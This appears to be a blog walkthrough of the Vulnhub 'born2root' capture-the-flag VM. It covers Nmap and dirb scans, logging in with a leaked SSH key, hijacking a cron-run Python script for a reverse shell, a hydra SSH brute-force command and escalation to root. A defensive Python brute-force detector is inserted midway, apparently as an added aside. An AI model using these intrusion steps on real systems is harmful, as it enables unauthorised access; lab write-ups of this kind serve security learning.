Yoga7xm's Blog

Vulnhub: born2root

2019/01/10

0x00 Preface

Exams have been a bit stressful lately, so I took some time off to play with a boot2root VM.

0x01 Target VM

https://www.vulnhub.com/entry/born2root-1,197/

0x02 Environment setup

Import the downloaded OVA into VirtualBox and it is ready to go.

  • Target: 192.168.43.182
  • Kali: 192.168.43.156
  • Windows: 192.168.43.208

0x03 Play

1. Information gathering

root@kali:~# nmap -sS -T4 -A -p- -v 192.168.43.182
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-03 20:44 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating ARP Ping Scan at 20:44
Scanning 192.168.43.182 [1 port]
Completed ARP Ping Scan at 20:44, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:44
Completed Parallel DNS resolution of 1 host. at 20:44, 0.80s elapsed
Initiating SYN Stealth Scan at 20:44
Scanning 192.168.43.182 [65535 ports]
Discovered open port 80/tcp on 192.168.43.182
Discovered open port 111/tcp on 192.168.43.182
Discovered open port 22/tcp on 192.168.43.182
Discovered open port 40635/tcp on 192.168.43.182
Completed SYN Stealth Scan at 20:44, 7.25s elapsed (65535 total ports)
Initiating Service scan at 20:44
Scanning 4 services on 192.168.43.182
Completed Service scan at 20:44, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.182
NSE: Script scanning 192.168.43.182.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.36s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.01s elapsed
Nmap scan report for 192.168.43.182
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 40635/tcp status
|_ 100024 1 58402/udp status
40635/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Sun Feb 3 20:41:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.43.182

NSE: Script Post-scanning.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.28 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Apart from rpcbind, only the web service on port 80 and SSH on port 22 are open, so port 80 is the only realistic place to start.

2. Directory scanning

root@kali:~# dirb http://192.168.43.182 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Feb 3 20:49:46 2019
URL_BASE: http://192.168.43.182/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.43.182/ ----
==> DIRECTORY: http://192.168.43.182/files/
==> DIRECTORY: http://192.168.43.182/icons/
+ http://192.168.43.182/index.html (CODE:200|SIZE:5651)
==> DIRECTORY: http://192.168.43.182/manual/
+ http://192.168.43.182/robots.txt (CODE:200|SIZE:57)
+ http://192.168.43.182/server-status (CODE:403|SIZE:302)

-----------------
END_TIME: Sun Feb 3 20:49:57 2019
DOWNLOADED: 4612 - FOUND: 3

This turns up the icons and files directories, plus a robots.txt.

3. Vulnerability probing

The icons directory turns out to be browsable (directory listing is enabled), while the files directory is empty and the directories named in robots.txt are empty as well.

Opening http://192.168.43.182/icons/VDSoyuAXiO.txt reveals an RSA private key, most likely an SSH key, so save it as id_rsa and try it against SSH; the username could be Martin, Hadi, Jimmy or root.

Trying them one by one, the login as Martin succeeds.

Once logged in, read the passwd file to enumerate all system users.

martin@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

There are four real system users: martin, jimmy, hadi and root.

Next I looked for files belonging to the other two users, without result.

martin@debian:~$ find / -user hadi 2>/dev/null
/home/hadi
/home/hadi/.bash_logout
/home/hadi/.ssh
/home/hadi/.ssh/authorized_keys
/home/hadi/.profile
/home/hadi/.bashrc
martin@debian:~$ find / -user jimmy 2>/dev/null
/home/jimmy
/var/mail/jimmy
martin@debian:~$ cat /var/mail/jimmy
cat: /var/mail/jimmy: Permission non accordée

Checking the scheduled tasks with cat /etc/crontab reveals a Python file run as jimmy, executed every five minutes.

martin@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py

So create a sekurity.py that spawns a reverse shell, listen on the chosen port, and the shell comes back as jimmy.

But nothing useful for privilege escalation turned up in this user's context either, so the only option left is the third user, hadi: generate a wordlist with an online dictionary generator and brute-force the account with hydra (link).

The brute force succeeds; the password is hadi123.

hydra -l hadi -P hadi.txt -t 50 -e ns 192.168.43.182 ssh
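A hydra run like the one above with 50 parallel tasks produces a dense burst of sshd "Failed password" lines from one source, typically followed by an "Accepted" line once the wordlist hits. The detector below is an added example (not part of the original writeup) that parses such lines, counts failures per source IP in a sliding 60-second window, and records any successful login from an IP that already crossed the threshold; the log lines embedded in it are constructed, not captured from the VM.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log lines (not captured from the target);
# they mimic what sshd logs while a wordlist is run against one account.
SAMPLE_LOG = """\
Feb  3 21:10:01 debian sshd[2031]: Failed password for hadi from 192.168.43.156 port 40122 ssh2
Feb  3 21:10:01 debian sshd[2033]: Failed password for hadi from 192.168.43.156 port 40123 ssh2
Feb  3 21:10:02 debian sshd[2035]: Failed password for hadi from 192.168.43.156 port 40124 ssh2
Feb  3 21:10:02 debian sshd[2037]: Failed password for invalid user admin from 192.168.43.156 port 40125 ssh2
Feb  3 21:10:03 debian sshd[2039]: Failed password for hadi from 192.168.43.156 port 40126 ssh2
Feb  3 21:10:04 debian sshd[2051]: Accepted password for hadi from 192.168.43.156 port 40140 ssh2
Feb  3 21:15:30 debian sshd[2101]: Failed password for martin from 192.168.43.208 port 51000 ssh2
Feb  3 21:16:00 debian sshd[2103]: Accepted publickey for martin from 192.168.43.208 port 51001 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text, year=2019):
    """Return (timestamp, result, user, ip) tuples for sshd login lines."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failures in one window; note later successes."""
    failures = defaultdict(list)
    alerts = {}
    for ts, result, user, ip in sorted(events):
        if result == "Failed":
            failures[ip].append(ts)
            # keep only failures still inside the sliding window
            failures[ip] = [t for t in failures[ip] if ts - t <= window]
            if len(failures[ip]) >= threshold:
                alerts.setdefault(ip, {"failures": 0, "compromised_users": set()})
                alerts[ip]["failures"] = max(alerts[ip]["failures"], len(failures[ip]))
        elif ip in alerts:
            # a success from an IP that was already brute-forcing: likely compromise
            alerts[ip]["compromised_users"].add(user)
    return alerts
```

Running `detect_bruteforce(parse_auth_log(open("/var/log/auth.log").read()))` on a real host gives the same structure; a non-empty `compromised_users` set is the entry to act on first.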

After logging in as hadi, switching to root works straight away, so read the flag.

root@debian:~# cat flag.txt

,-----. ,---. ,------. ,--.
| |) /_ ,---. ,--.--.,--,--, '.-. \| .--. ' ,---. ,---. ,-' '-.
| .-. \| .-. || .--'| \ .-' .'| '--'.'| .-. || .-. |'-. .-'
| '--' /' '-' '| | | || |/ '-.| |\ \ ' '-' '' '-' ' | |
`------' `---' `--' `--''--''-----'`--' '--' `---' `---' `--'


Congratulations ! you pwned completly Born2root's CTF .

I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p

I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...

Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !

Enumeration is The Key .


Give me feedback :[FB] Hadi Men

0x04 Summary

This VM is fairly basic: a browsable directory leaks an SSH private key, the key is tried against the candidate usernames until it works as Martin, then /etc/passwd lists the other system users. A file search turns up a Python script run by cron; writing a reverse-shell command into it yields jimmy's shell, which is not much use, so hadi's password is brute-forced instead. Finally, hadi can switch straight to root, and that is the flag!!!
